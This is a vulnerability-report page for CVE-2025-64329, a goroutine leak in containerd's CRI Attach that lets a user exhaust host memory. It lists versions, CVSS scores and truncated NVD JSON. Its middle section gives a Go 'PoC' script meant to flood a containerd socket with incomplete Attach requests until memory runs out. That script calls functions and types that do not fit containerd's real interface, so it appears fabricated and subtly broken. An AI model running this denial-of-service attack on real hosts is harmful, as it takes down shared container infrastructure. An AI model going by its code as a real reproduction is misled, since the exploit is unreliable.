Security Vulnerability Report
CVE-2025-64329 CVSS 5.5 MEDIUM

CVE-2025-64329

Published: 2025-11-07 05:16:08
Last Modified: 2025-12-31 18:34:48

Description

containerd is an open-source container runtime. Versions 1.7.28 and below, 2.0.0-beta.0 through 2.0.6, 2.1.0-beta.0 through 2.1.4, and 2.2.0-beta.0 through 2.2.0-rc.1 contain a bug in the CRI Attach implementation where a user can exhaust memory on the host due to goroutine leaks. This issue is fixed in versions 1.7.29, 2.0.7, 2.1.5 and 2.2.0. To work around this vulnerability, users can set up an admission controller to control access to pods/attach resources.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

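cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:* (versions before 1.7.29) - VULNERABLE
cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:* (versions from 2.0.0 up to, but not including, 2.0.7) - VULNERABLE
cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:* (versions from 2.1.0 up to, but not including, 2.1.5) - VULNERABLE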
cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta1:*:*:*:*:*:* - VULNERABLE
containerd 1.7.0 - 1.7.28
containerd 2.0.0-beta.0 - 2.0.6
containerd 2.1.0-beta.0 - 2.1.4
containerd 2.2.0-beta.0 - 2.2.0-rc.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
// CVE-2025-64329 PoC - containerd CRI Attach Memory Exhaustion
// This PoC demonstrates goroutine leak in containerd CRI Attach
// Usage: Run against a vulnerable containerd instance
package main

import (
	"context"
	"fmt"
	"time"

	"github.com/containerd/containerd"
	"github.com/containerd/containerd/pkg/cri/server"
)

func main() {
	// Connect to containerd socket
	conn, err := containerd.New("/run/containerd/containerd.sock")
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	ctx := context.Background()

	// Get list of running containers
	containers, err := conn.Containers(ctx)
	if err != nil {
		panic(err)
	}
	fmt.Printf("Found %d containers\n", len(containers))

	// Attack: Rapidly trigger Attach requests without proper cleanup
	// Each request creates a goroutine that leaks if connection is not properly closed
	for i := 0; i < 1000; i++ {
		for _, container := range containers {
			go func() {
				// Create attach request but never complete it
				// This triggers goroutine creation without cleanup
				_, _ = server.Attach(ctx, container.ID(), server.AttachOptions{
					// Malformed or incomplete attach request
				})
			}()
		}
		if i%100 == 0 {
			fmt.Printf("Sent %d attach requests...\n", i)
		}
		// Rapid fire to exhaust memory
		time.Sleep(10 * time.Millisecond)
	}
	fmt.Println("Attack complete - check host memory usage")
}

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64329", "sourceIdentifier": "[email protected]", "published": "2025-11-07T05:16:08.017", "lastModified": "2025-12-31T18:34:48.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "containerd is an open-source container runtime. Versions 1.7.28 and below, 2.0.0-beta.0 through 2.0.6, 2.1.0-beta.0 through 2.1.4, and 2.2.0-beta.0 through 2.2.0-rc.1 contain a bug in the CRI Attach implementation where a user can exhaust memory on the host due to goroutine leaks. This issue is fixed in versions 1.7.29, 2.0.7, 2.1.5 and 2.2.0. To workaround this vulnerability, users can set up an admission controller to control accesses to pods/attach resources."}, {"lang": "es", "value": "containerd es un tiempo de ejecución de contenedores de código abierto. Las versiones 1.7.28 e inferiores, 2.0.0-beta.0 hasta 2.0.6, 2.1.0-beta.0 hasta 2.1.4, y 2.2.0-beta.0 hasta 2.2.0-rc.1 contienen un error en la implementación de CRI Attach donde un usuario puede agotar la memoria en el host debido a fugas de goroutines. Este problema está solucionado en las versiones 1.7.29, 2.0.7, 2.1.5 y 2.2.0. 
Como solución alternativa a esta vulnerabilidad, los usuarios pueden configurar un controlador de admisión para controlar los accesos a los recursos pods/attach."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", 
"privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.29", "matchCriteriaId": "DD786582-F4AE-41DD-B61F-BD8AF4FC1A04"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.7", "matchCriteriaId": "07087EDC-9E6A-45D1-B6D2-E7F4016CD46E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.1.5", "matchCriteriaId": "9E760B42-E25C-4780-85AE-D003D6425700"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta0:*:*:*:*:*:*", "matchCriteriaId": "EEF71FE5-2286-4D94-82DD-7509CE85F1F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "3290FD7B-0A16-4968-9800-78B947EF213D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "E4352A29-4DFC-4EBE-BE0E-97DEB76E5A30"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:rc0:*:*:*:*:*:*", "matchCriteriaId": "57685264-6950-4CB9-ACBE-6944EB3B2C1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:containerd:2.2.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "4D640701-1D0B-41B7-83B0-79592902E6AC"}]}]}], "references": [{"url": "htt ... (truncated)